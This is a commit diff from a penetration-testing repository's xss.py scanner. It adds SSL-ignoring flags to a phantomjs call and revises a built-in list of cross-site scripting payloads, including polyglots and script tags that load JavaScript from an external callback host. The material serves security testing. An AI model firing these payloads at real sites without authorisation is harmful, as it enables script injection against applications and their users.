Projects STRLCPY pentest-tools Commits 823bfd82
🤬
Revision indexing in progress... (symbol navigation in revisions will be accurate after indexed)
  • ■ ■ ■ ■ ■ ■
    xss.py
    skipped 208 lines
    209 209  if not os.path.isfile(_phantom):
    210 210   parser.error( 'phantomjs not found!' )
    211 211  # _phantom_cmd = _phantom + ' ' + os.path.dirname(os.path.realpath(__file__)) + '/phantom-xss.js'
    212  -_phantom_cmd = _phantom + ' --load-images=false ' + os.path.dirname(os.path.realpath(__file__)) + '/phantom-xss.js'
     212 +_phantom_cmd = _phantom + ' --ignore-ssl-errors=true --ssl-protocol=any --load-images=false ' + os.path.dirname(os.path.realpath(__file__)) + '/phantom-xss.js'
    213 213  # _phantom_cmd = _phantom + ' ' + os.path.dirname(os.path.realpath(__file__)) + '/puppeteer-xss.js'
    214 214  # print( _phantom_cmd )
    215 215   
    skipped 80 lines
    296 296  # source: https://twitter.com/brutelogic/status/1138805808328839170
    297 297  if not n_payloads:
    298 298   t_payloads = [
    299  - '\'"--><sVg onload=prompt(1)>',
    300 299   '\'"--><a autofocus onfocus=prompt(1) href=?>.',
    301 300   '\'"--></sCrIpt><sCRIpt>prompt(1)</SCript>',
    302 301   '\'"--><svG><scRIpt href=data:,prompt(1) />',
    skipped 2 lines
    305 304   "'\")];*/prompt(1);/*",
    306 305   '" onload=prompt(1)>',
    307 306   '\'"--><SCripT src="//glc.xss.ht">',
     307 + '\'"--><SCripT src=https://glc.xss.ht>',
    308 308   '\'"--><sCRipt src=javascript:[1].find(prompt)>',
    309  - "'\"--><x v-on=_c.constructor('prompt(1)')()>",
     309 + "'\"--><sVg/OnLuFy=\"X=y\"oNloaD=;1^confirm(1)>/``^1//",
     310 + "javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/\"/+/onmouseover=1/+/[*/[]/+alert(1)//'>",
    310 311   ]
    311 312  n_payloads = len(t_payloads)
    312 313   
    skipped 99 lines
Please wait...
Page is in error, reload to recover